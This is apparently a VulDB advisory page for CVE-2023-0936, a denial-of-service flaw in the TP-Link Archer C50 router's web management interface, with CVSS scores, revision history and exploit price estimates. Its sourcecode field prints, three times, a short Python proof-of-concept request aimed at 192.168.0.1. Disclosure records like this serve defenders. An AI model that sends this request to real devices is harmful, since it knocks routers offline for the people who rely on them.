TP-Link Archer C50 V2_160801 Web Management Interface denial of service

A vulnerability was found in TP-Link Archer C50 V2_160801. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Web Management Interface. The manipulation leads to denial of service. Using CWE to declare the problem leads to CWE-404. The weakness was disclosed 02/21/2023. This vulnerability is handled as CVE-2023-0936. The attack can only be initiated within the local network. There are no technical details available. Furthermore, there is an exploit available. The exploit has been disclosed to the public and may be used. The current price for an exploit might be approx. USD $0-$5k at the moment. It is declared as proof-of-concept. The exploit is available at vuldb.com. As 0-day the estimated underground price was around $0-$5k. A possible mitigation has been published before and not just after the disclosure of the vulnerability.

Field03/23/2023 15:4403/23/2023 15:4903/27/2023 22:56
vendorTP-LinkTP-LinkTP-Link
nameArcher C50Archer C50Archer C50
versionV2_160801V2_160801V2_160801
componentWeb Management InterfaceWeb Management InterfaceWeb Management Interface
cwe404 (denial of service)404 (denial of service)404 (denial of service)
risk111
cvss3_vuldb_avAAA
cvss3_vuldb_acLLL
cvss3_vuldb_prNNN
cvss3_vuldb_uiNNN
cvss3_vuldb_sUUU
cvss3_vuldb_cNNN
cvss3_vuldb_iNNN
cvss3_vuldb_aHHH
cvss3_vuldb_ePPP
cvss3_vuldb_rcRRR
availability111
publicity111
cveCVE-2023-0936CVE-2023-0936CVE-2023-0936
responsibleVulDBVulDBVulDB
date1676934000 (02/21/2023)1676934000 (02/21/2023)1676934000 (02/21/2023)
cvss2_vuldb_avAAA
cvss2_vuldb_acLLL
cvss2_vuldb_auNNN
cvss2_vuldb_ciNNN
cvss2_vuldb_iiNNN
cvss2_vuldb_aiCCC
cvss2_vuldb_ePOCPOCPOC
cvss2_vuldb_rcURURUR
cvss2_vuldb_rlNDNDND
cvss3_vuldb_rlXXX
cvss2_vuldb_basescore6.16.16.1
cvss2_vuldb_tempscore5.25.25.2
cvss3_vuldb_basescore6.56.56.5
cvss3_vuldb_tempscore5.95.95.9
cvss3_meta_basescore6.56.56.5
cvss3_meta_tempscore5.96.36.3
price_0day$0-$5k$0-$5k$0-$5k
languagePythonPythonPython
sourcecodeimport requests import time device_web_ip = '192.168.0.1' request = {'HEAD' : {'Host' : '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'close', 'Cookie' : 'Authorization', 'Upgrade-Insecure-Requests' : '1', 'Cache-Control' : 'max-age=0' }, 'ATTR': {'URL': 'http://{}/'.format(device_web_ip), 'METHOD': 'GET', 'VERSION': 'HTTP/1.1' } } headers = request['HEAD'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL'] try: r = requests.request(method=method,url=url,headers=headers,verify=False,timeout=0.5) except: passimport requests import time device_web_ip = '192.168.0.1' request = {'HEAD' : {'Host' : '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'close', 'Cookie' : 'Authorization', 'Upgrade-Insecure-Requests' : '1', 'Cache-Control' : 'max-age=0' }, 'ATTR': {'URL': 'http://{}/'.format(device_web_ip), 'METHOD': 'GET', 'VERSION': 'HTTP/1.1' } } headers = request['HEAD'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL'] try: r = requests.request(method=method,url=url,headers=headers,verify=False,timeout=0.5) except: passimport requests import time device_web_ip = '192.168.0.1' request = {'HEAD' : {'Host' : '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'close', 'Cookie' : 'Authorization', 'Upgrade-Insecure-Requests' : '1', 'Cache-Control' : 'max-age=0' }, 'ATTR': {'URL': 'http://{}/'.format(device_web_ip), 'METHOD': 'GET', 'VERSION': 'HTTP/1.1' } } headers = request['HEAD'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL'] try: r = requests.request(method=method,url=url,headers=headers,verify=False,timeout=0.5) except: pass
cve_assigned1676934000 (02/21/2023)1676934000 (02/21/2023)1676934000 (02/21/2023)
cve_nvd_summaryA vulnerability was found in TP-Link Archer C50 V2_160801. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Web Management Interface. The manipulation leads to denial of service. The attack can only be initiated within the local network. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221552.A vulnerability was found in TP-Link Archer C50 V2_160801. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Web Management Interface. The manipulation leads to denial of service. The attack can only be initiated within the local network. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221552.A vulnerability was found in TP-Link Archer C50 V2_160801. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Web Management Interface. The manipulation leads to denial of service. The attack can only be initiated within the local network. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221552.
cvss3_nvd_avAA
cvss3_nvd_acLL
cvss3_nvd_prNN
cvss3_nvd_uiNN
cvss3_nvd_sUU
cvss3_nvd_cNN
cvss3_nvd_iNN
cvss3_nvd_aHH
cvss2_nvd_avAA
cvss2_nvd_acLL
cvss2_nvd_auNN
cvss2_nvd_ciNN
cvss2_nvd_iiNN
cvss2_nvd_aiCC
cvss3_cna_avAA
cvss3_cna_acLL
cvss3_cna_prNN
cvss3_cna_uiNN
cvss3_cna_sUU
cvss3_cna_cNN
cvss3_cna_iNN
cvss3_cna_aHH
cve_cnaVulDBVulDB
cvss2_nvd_basescore6.16.1
cvss3_nvd_basescore6.56.5
cvss3_cna_basescore6.56.5
affectedlistTP-Link Archer C50 V2_160801 TP-Link Archer C2v1 V1_170228 TP-Link Archer C20v1 V1_141217 TP-Link Archer C7v2 V1_170228

Interested in the pricing of exploits?

See the underground prices here!